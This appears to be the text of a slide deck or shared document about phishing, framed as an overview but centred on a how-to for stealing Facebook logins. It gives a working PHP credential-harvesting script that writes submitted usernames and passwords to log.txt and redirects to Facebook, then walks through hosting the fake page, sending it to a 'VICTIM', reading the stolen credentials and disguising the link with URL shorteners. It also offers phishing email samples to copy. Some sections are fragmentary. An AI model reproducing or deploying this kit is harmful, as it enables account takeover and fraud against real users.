Professional Documents
Culture Documents
History of Phishing
What is Phishing?
Types of Phishing
Why it is called as a Social Engineering Technique?
Steps to perform Phishing
Tricks to perform Phishing
Precautions against Phishing Attempts
History of Phishing
In actuality, the phishing victim later discovers his personal identity and
other vital information have been stolen and exposed.
Types of Phishing
Desktop Phishing
Spear Phishing
SMS Phishing
Voice Phishing : Voice phishing is currently the latest type of phishing. Not
all phishing attacks require a fake website. Messages that claimed to be
from a bank told users to dial a phone number regarding problems with
their bank accounts. Once the phone number (owned by the phisher, and
provided by a Voice over IP service) was dialled, prompts told users to
enter their account numbers and PIN. Vishing (voice phishing) sometimes
uses fake caller-ID data to give the appearance that calls come from a
trusted organization.
Phishing – A Social Engineering Technique
In order to create a fake page, you need to go to target web page, for
example you want to phish someone’s facebook account username and
password, you need to go to https://www.facebook.com and have to save
the web page by either pressing Ctrl + S or by right clicking on screen and
choose Save Page as option.
Now you need to open it in any text editor like Notepad, Notepad++ etc.
Steps to perform Phishing
Copy the below given PHP code in notepad and save it as login.php
<?php
header ('Location: https://www.facebook.com/login.php?login_attempt=1');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Steps to perform Phishing
Step 3 : Upload these 2 files i.e. fake page and phishing script
on some server.
Step 4 : Send a fake page link to VICTIM via en email or any other media.
Step 5 : As soon as VICTIM will open your page and enter the credentials,
his credentials would be logged on your server and a new file named as
log.txt would get generated at following location.
File Manager public_html log.txt
Step 6 : Open log.txt to see VICTIM’s username and password.
That’s it, you have phished a VICTIM successfully.
Tricks to perform Phishing
Below are some real time emails that are recorded as a phishing attempt
on some popular sites.
You can also do it in a same way.
Our systems have detected an unusual high volume email traffic from this email address with the
data listed below:
You can also shorten your fake page link or say phishing link
by using some URL Shortening services.
Below are some good URL Shorteners.